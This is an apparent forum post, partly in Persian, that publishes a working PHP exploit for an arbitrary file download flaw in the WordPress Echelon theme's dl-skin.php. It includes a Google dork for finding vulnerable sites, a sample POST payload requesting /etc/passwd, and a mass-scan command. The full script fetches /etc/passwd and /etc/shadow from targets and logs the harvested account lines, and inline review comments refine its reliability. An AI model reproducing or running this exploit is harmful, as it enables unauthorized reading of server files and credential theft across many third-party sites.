WordPress A.F.D. Theme Echelon Arbitrary File Download

  • WordPress A.F.D. Theme Echelon Arbitrary File Download

    باگی از نوع Arbitrary File Download (به اختصار A.F.D) در تم وردپرس Echelon وجود دارد که با استفاده از آن می‌توان هر فایلی را که کاربرِ وب‌سرور اجازهٔ خواندن آن را دارد از روی سرور مورد نظر دانلود کرد (مسیر فایل مستقیماً از یک پارامتر POST خوانده می‌شود):

    کد:
    [php]*Name:*
    Wordpress A.F.D Theme Echelon / INURL - BRASIL
    
    *Description:*
    This exploit allows an attacker to download any file the web-server process can read from the server (the requested path comes straight from a POST parameter).
    
    *Usage info:*
    Put the path of the file in the file's field of the exploit ,then click
    "Download" button then you get the file directly
    
    Files requested by the exploit: /etc/passwd and /etc/shadow (note: /etc/shadow is normally readable only by root, so that request is expected to fail unless the web server runs with excessive privileges).
    
    The flaw is a user-controlled $_POST parameter that is passed to the file download logic in
    /wp-content/themes/echelon/lib/scripts/dl-skin.php
    
    The following fields are exploited for Arbitrary File Download
    *POST:*
    _mysite_download_skin={$config['file']}&submit=Download
    ex:
    _mysite_download_skin=/etc/passwd&submit=Download
    
    *Exploit:*
    
    
    
    <?php
    
    #===============================================================================
    # NAME:         Wordpress A.F.D Theme Echelon
    # TIPE:         Arbitrary File Download
    # Google DORK:  inurl:/wp-content/themes/echelon
    # Vendor:       www.wordpress.org
    # Tested on:    Linux
    # EXECUTE:      php exploit.php www.alvo.com.br
    # OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
    # AUTOR:        Cleiton Pinheiro
    # Blog:         http://blog.inurl.com.br
    # Twitter:      https://twitter.com/googleinurl
    # Fanpage:      https://fb.com/InurlBrasil
    # GIT:          https://github.com/googleinurl
    # YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
    #
    #
    #------------------------------------------------------------------------------
    #  Command Exec Scanner INURLBR:
    # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
    #
    #------------------------------------------------------------------------------
    # Download Scanner INURLBR:
    # https://github.com/googleinurl/SCANNER-INURLBR
    #===============================================================================
    
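    // Runtime setup: report only fatal errors (error_reporting(1) == E_ERROR), print them to
    // stdout, never time out, and push output out as soon as it is produced.
    error_reporting(1);
    set_time_limit(0);
    ini_set('display_errors', 1);
    ini_set('max_execution_time', 0);
    ini_set('allow_url_fopen', 1);
    ob_implicit_flush(true);
    // NOTE(review): on the CLI there is usually no output buffer, so this call raises a
    // notice ("failed to delete and flush buffer"); it is harmless and hidden by the
    // error_reporting level above.
    ob_end_flush();

    // The target host is the first CLI argument; without it there is nothing to do.
    $usage = '0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br';
    if (empty($argv[1])) {
        exit($usage);
    }
    // Prepend a scheme only when the argument does not already start with one. The previous
    // strstr($argv[1], 'http') test accepted "http" anywhere in the string (e.g. a host named
    // "www.http-cdn.example"), which then produced an unusable URL.
    if (!preg_match('#^https?://#i', $argv[1])) {
        $argv[1] = "http://{$argv[1]}";
    }
    // Keep only scheme + host (any path/query on the argument is dropped; the vulnerable
    // script's path is supplied by $config['exploit'] below).
    if (!preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) {
        exit($usage);
    }
    $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
    $config['alvo'] = $alvo_[0][0];
    // Theme script that accepts an arbitrary path in the _mysite_download_skin POST field.
    $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";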
    
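    /**
     * Push everything printed so far to the terminal/client immediately.
     *
     * ob_flush() needs an active output buffer. On the CLI there normally is none, and the
     * script's preamble calls ob_end_flush() anyway, so the original unconditional ob_flush()
     * raised "failed to flush buffer. No buffer to flush" on every call. Only flush the PHP
     * buffer when one exists; flush() (SAPI level) is always safe.
     *
     * @return void
     */
    function __plus() {
        if (ob_get_level() > 0) {
            ob_flush();
        }
        flush();
    }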
    
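    /**
     * Split a "k=v&k2=v2" query string into an array of URL-encoded values.
     *
     * Fixes two defects of the original: a value containing "=" was truncated at the first
     * "=" (explode() without a limit), and a part with no "=" at all, or an empty query,
     * triggered an undefined-offset notice.
     *
     * @param string $query raw query string, e.g. "_mysite_download_skin=/etc/passwd&submit=Download"
     * @return array<string,string> key => urlencode(value); keys are NOT encoded (as before)
     */
    function __convertUrlQuery($query) {
        $params = array();
        foreach (explode('&', $query) as $pair) {
            if ($pair === '') {
                continue;
            }
            // Limit 2: split on the first "=" only so the value keeps any further "=".
            $parts = explode('=', $pair, 2);
            $params[$parts[0]] = urlencode(isset($parts[1]) ? $parts[1] : '');
        }
        return $params;
    }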
    
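    /**
     * POST the requested file path to dl-skin.php and return the raw HTTP exchange.
     *
     * @param resource|\CurlHandle $curl   handle from curl_init(); it is closed before returning
     * @param array                $config ['alvo' => scheme+host, 'exploit' => script path,
     *                                      'file' => path to request from the target]
     * @return array|false ['corpo' => response headers + body, 'server' => curl_getinfo(),
     *                     'info' => one-line summary], or FALSE when the transfer failed.
     *                     (The original stored curl_exec()'s boolean false under 'corpo'
     *                     because isset(false) is true; callers then matched on nothing.)
     */
    function __request_info($curl, $config) {
        // Same bytes the hand-rolled __convertUrlQuery()/rtrim() round trip produced:
        // RFC 1738 urlencode() of each value, "&"-joined.
        $postDados_format = http_build_query(array(
            '_mysite_download_skin' => $config['file'],
            'submit'                => 'Download',
        ));
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
        curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
        // Randomised User-Agent so repeated scans do not share one fingerprint; rand() is
        // acceptable here because nothing security-relevant depends on the value.
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0 (X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/' . rand(1, 500) . '.31');
        curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . $config['exploit']);
        // Hostname verification is switched off so hosts whose certificate does not match
        // the scanned name still answer. CURLOPT_SSL_VERIFYPEER keeps its default, so an
        // untrusted chain still fails — but any CA-issued certificate is now accepted for
        // this host, i.e. an on-path attacker could read the response. Tolerable for a
        // scanner; never copy this into code that handles credentials.
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
        // NOTE(review): only the connect phase is bounded; a target that accepts the
        // connection and never answers will hang this request indefinitely.
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
        // Response headers are kept in front of the body so the status line and
        // Content-Disposition can be reported.
        curl_setopt($curl, CURLOPT_HEADER, 1);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

        $corpo = curl_exec($curl);
        $server = curl_getinfo($curl);
        curl_close($curl);
        unset($curl);
        if ($corpo === false) {
            return FALSE;
        }

        // One-line summary: status line, Server header, Content-Disposition (if present).
        // Missing headers yield '' instead of the undefined-index notices of the original.
        $status = array();
        $padroes = array(
            'http'                => '(HTTP.*)',
            'server'              => '(Server:.*)',
            'Content-Disposition' => '(Content-Disposition:.*)',
        );
        foreach ($padroes as $chave => $padrao) {
            $status[$chave] = preg_match($padrao, $corpo, $m) ? $m[0] : '';
        }
        $info = "{$status['http']}, {$status['server']} {$status['Content-Disposition']}";
        $info = str_replace(array("\r", "\n"), '', $info);

        return array('corpo' => $corpo, 'server' => $server, 'info' => $info);
    }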
    
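    /**
     * Report the outcome of one download attempt and persist hits.
     *
     * @param array $config ['file' => requested path, 'line' => separator, 'alvo' => target]
     * @param array $rest   __request_info() result; only 'corpo' (headers + body) is read
     * @return void Prints to stdout and appends hits to EXPLOIT_WPAFD_Echelon.txt.
     */
    function main($config, $rest) {
        __plus();
        // date("H:i:s") — the original used "h:m:s", and "m" is the MONTH, so every
        // timestamp printed hour:month:second.
        print "0x " . date("H:i:s") . " [INFO][EXPLOITATION THE FILE]: {$config['file']}:\n";
        $corpo = isset($rest['corpo']) ? (string) $rest['corpo'] : '';

        // Vulnerability oracle: a genuine passwd/shadow entry for root, i.e. "root:" followed
        // by a password field and two numeric fields ("root:x:0:0:" or "root:$6$...:17000:0:").
        // The original test was preg_match("#root#i", ...), which reported [IS VULN] for any
        // response that merely contained the word "root" (an HTML error page, a header...).
        if (!preg_match('#^root:[^:\r\n]*:\d+:\d+:#m', $corpo)) {
            print "0x " . date("H:i:s") . " [INFO][NOT VULN]\n";
            return;
        }

        // Collect the well-known account lines for the report (same five as before).
        $_final = array();
        foreach (array('root', 'sbin', 'ftp', 'nobody', 'mail') as $conta) {
            preg_match_all("({$conta}:.*)", $corpo, $m);
            $_final = array_merge($_final, $m[0]);
        }

        $res = "0x " . date("H:i:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
        $res .= $config['line'] . "\n";
        foreach ($_final as $value) {
            // ".*" stops at "\n" only, so strip the "\r" of CRLF responses.
            $res .= "0x " . date("H:i:s") . " [VALUE]: " . rtrim($value, "\r") . "\n";
        }
        $res .= $config['line'];
        __plus();
        // Append, never overwrite: the scanner invokes this script once per target.
        file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
        print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
    }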
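    // Entry point: banner, then one request per candidate file, each reported via main().
    print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
    // Was `print $line;` — an undefined variable, so the separator was never printed.
    print $config['line'];
    // date("H:i:s"): the original "h:m:s" printed hour:MONTH:second.
    print "0x " . date("H:i:s") . " [INFO][TARGET]: {$config['alvo']}\n";
    // /etc/passwd is world-readable and is the reliable oracle; /etc/shadow is normally
    // readable by root only, so that attempt is expected to fail on a sanely configured host.
    foreach (array('/etc/passwd', '/etc/shadow') as $arquivo) {
        $config['file'] = $arquivo;
        $rest = __request_info(curl_init(), $config);
        __plus();
        if ($rest === FALSE) {
            // Transport-level failure (no HTTP response at all) — nothing to analyse.
            print "0x " . date("H:i:s") . " [ERROR][NO RESPONSE]: {$config['file']}\n";
            continue;
        }
        print "0x " . date("H:i:s") . " [INFO]: {$rest['info']}\n";
        main($config, $rest);
        __plus();
    }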
    [/php]